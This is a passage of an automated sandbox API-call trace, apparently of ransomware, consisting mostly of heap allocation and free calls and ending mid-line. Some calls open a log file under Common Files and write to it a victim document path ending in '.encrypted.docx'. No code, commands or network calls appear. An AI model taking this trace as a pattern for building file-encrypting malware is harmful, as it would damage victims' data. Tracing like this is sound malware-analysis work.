[0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.007] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.007] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.007] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0033.007] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0033.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0033.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.008] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x110) returned 0x7c5448 [0033.008] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.009] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.009] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0033.009] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.010] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.010] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.010] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.010] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0033.010] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0033.011] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.011] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.011] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.011] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0xe5a, lpOverlapped=0x0) returned 1 [0033.012] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.012] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0xe5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.012] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.encrypted.docx\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0033.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f3688 [0033.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.encrypted.docx\r\n", cchWideChar=73, lpMultiByteStr=0x7f3688, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CIgOY5U5b6Axtcb.encrypted.docx\r\n", lpUsedDefaultChar=0x0) returned 73 [0033.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.012] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0033.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0033.012] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0033.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0033.012] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.012] CloseHandle (hObject=0x140) returned 1 [0033.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.013] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0033.014] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.015] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.015] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.015] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.016] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.016] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.016] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.016] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af468 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0033.016] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.016] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce80 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.017] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.017] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.017] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0033.018] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.018] HeapFree (in: 